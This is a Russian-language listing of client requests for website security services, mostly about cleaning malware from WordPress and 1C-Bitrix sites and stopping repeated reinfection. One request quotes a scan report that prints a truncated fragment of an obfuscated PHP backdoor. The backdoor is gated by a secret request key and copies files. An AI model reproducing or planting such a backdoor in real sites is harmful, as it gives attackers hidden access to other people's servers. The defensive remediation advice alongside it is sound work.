Услуги по безопасности сайтов в Самаре

Другое.

Платформа: WordPress.

Объём сайта: 1000 страниц.

Нужно лечение и защита 2-х сайтов от вирусов (перенаправление в мобильной версии) . Один сайт на вордпрессе. второй на диафане

Корпоративный сайт.

Платформа: 1С-Битрикс.

Объём сайта: 6 страниц.

На сайте обнаружены вирусы связанные с решением аспро и не только. Необходимо удалить их, чтобы сайт начал функционировать и работать

Корпоративный сайт.

Платформа: Tilda.

Объём сайта: 20 страниц.

Хочу обучиться проверке сайта на угрозы для открытия своего бизнеса

Интернет-магазин.

Платформа: 1С-Битрикс.

Объём сайта: 1 страница.

Сайт supertrus.ru - хостинг провайдер отключили возможность отправки-получения писем. Нужно проверить сайт на наличие стороннего кода:

Ответ службы поддержки хостинг-провайдера:

Примененный к сайту ограничивающий шаблон блокирует запуск части известных вредоносных скриптов и шеллов, а также препятствует повторному заражению сайта. Наша система среагировала на вирусные сигнатуры:

/home/d/dest12/test23/public_html/21a74e26d4a5.php

Вероятно, Ваш сайт был взломан.

Вам необходимо проверить файлы сайтов на наличие стороннего кода, не характерного для Вашей CMS, а также наличие посторонних файлов среди файлов сайта. Для проверки Вы можете использовать утилиту AI-Bolit. С её помощью Вы можете провести проверку в параноидальный режиме и получить отчет, с указанием файлов, на которые необходимо обратить внимание. Полученную информацию вы можете передать профильным специалистам для дальнейшего анализа. Я проверил и получил вот такие данные (файлы могут быть вредоносными или хакерскими скриптами (1):

/home/d/dest12/supertrus.ru/public_html/bitrix/modules/main/include.php.backup

[x] …tic function IsFeatureInstalled($_[Телефон скрыт]){return true;}}$GLOBALS['____53545652'][0](___[Телефон скрыт](0),___[Телефон скрыт](1)); if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"].

Особенно часто вредоносный код попадает через уязвимые темы, шаблоны или плагины, установленные со сторонних ресурсов. Не используйте устаревшие версии CMS и плагинов к ним. Следите за обновлениями!

Первоначальные меры, которые нужно предпринять, следующие:

Обратиться к профильным специалистам(если такая возможность есть), которые занимаются безопасностью сайтов, для более детального изучения файлов и выявления вредоносного кода и найти причину взлома.

После определения причины взлома не ограничивайтесь удалением найденных скриптов - добавленные злоумышленником точки проникновения могут быть хорошо спрятаны.

Если сайт работает некорректно, то следует восстановить сайт из резервной копии в разделе Backup, предварительно, закрыв доступ посетителей к нему.

Восстановление сайта на дату, когда он был заражен, не исправит ситуацию. На сайте останутся точки проникновения и сами вирусы.

Обновить ядро CMS, а также все плагины до последней версии.

Удалить неиспользуемые темы и расширения.

Проверьте файл .htaccess - в нем могут быть добавлены перенаправления на другие сайты, распространяющие вирус. При этом файл .htaccess может быть размещен как в корне сайта, так и выше, поэтому необходимо просмотреть все директории вашего аккаунта. Найти все файлы .htaccess вы можете с помощью команды: find -name *htaccess, которую вы можете выполнить в WEB Терминале.

Обязательно изменить пароли для административной панели сайта, email’ов администратора, FTP, MySQL. Желательно устанавливать сгенерированные случайным образом пароли, их сложнее подобрать.

Открыть доступ к сайту.

Вот такой фронт работ

Веб-портал.

Платформа: 1С-Битрикс.

Объём сайта: 15 страниц.

Отразить спам и установить защиту

Веб-портал.

Платформа: госвеб.

Объём сайта: 13 страниц.

Проверить на наличие информации о противодействии экстеримизму, социальной рекламе.

Это сайт школы

Лендинг.

Платформа: MODx.

У нас сайт на modx, лейдинг. На него ведется много трафика.

Наши конкуренты парсят с наших лейдингов номера телефонов клиентов, и потом начинают массовый обзвон.

Есть полуряные сервисы БИГ ДАТА и Ванрезалт, где добавляешь ссылку на сайт и он тебе генерирует номера телефонов посетителей.

Цель как сделать так, чтобы никакой из этих сервисов или других по аналогичный системе не мог спарсить номера, чтобы защитить себя как компанию и клиентов от массового обзвона

Сайт-визитка.

Платформа: 1С-Битрикс.

Здравствуйте !

Сайт geliosartshop.ru взломали/заразили.

В данный момент у нас имеется резервная копия сайта до взлома/заражения, но если её поместить в папку "public_html", то через какое-то время происходит заражение/изменения файлов "index.php", ".htaccess", "robots.txt".

Создание посторонних каталогов и файлов, которые распознаются антивирусом в аккаунте "SpaceWeb" как файлы с потенциально опасным содержимым. Лечение, восстановление из резервной копии не помогает, т.к. всё перезаписывается снова

Интернет-магазин.

Платформа: 1С-Битрикс.

Объём сайта: 20 страниц.

На одном хостинге рег ру работали сайты вордпресс, битрикс, друпал и возможно тильда.

2.02.25 регру блокировал хостинг за вредоносное по и аномалию исходящего трафика. Хостинг восстановлен из бекапа.

3.02.25 на сайте ***s.ru не было ssl сертификата.

4.02.25 продлена лицензия битрикс (чтоб обновиться, но новых обновлений не было найдено, до 8 php обновиться не удалось, слетает сайт) оплачена опция лечения от рег ру. Есть скан вирусов на эту дату (4 на битриксе, 1 на вордпресс).

Лечение от регру не помогает. Часть сайтов слетает, вирусы возвращаются.

10.03.25 в связи с перегрузкой хостинга сайты вордпресс перенесены на отдельный хостинг.

При лечении регру слетает сайт i***. После восстановления из бекапа админка открывается, но перейти в пункты меню не даёт (wordfence не установить)

На r**.g***s wordfance вирусов не находит, из уязвимостей: необновленный элементор (при обновлении слетает сайт) и бесплатная версия плагина slider revolution.

12.02.25. Проверка регру фиксирует вирусы на всех сайтах. Штатные методы борьбы не помогли.

При скачивании бекапов с регру от 11.02.25 на компьютер касперский блокировал архивы сайтов lp.im***s.ru и p***s.com, обнаружив Heur: Backdoor.PHP.WebSell.gen.

Есть бекапы:

- всего аккаунта хостинга от 6.01.25 и 7.01.25.

- отдельно сайтов и баз данных от 11.02.25

Нужно вылечить от вирусов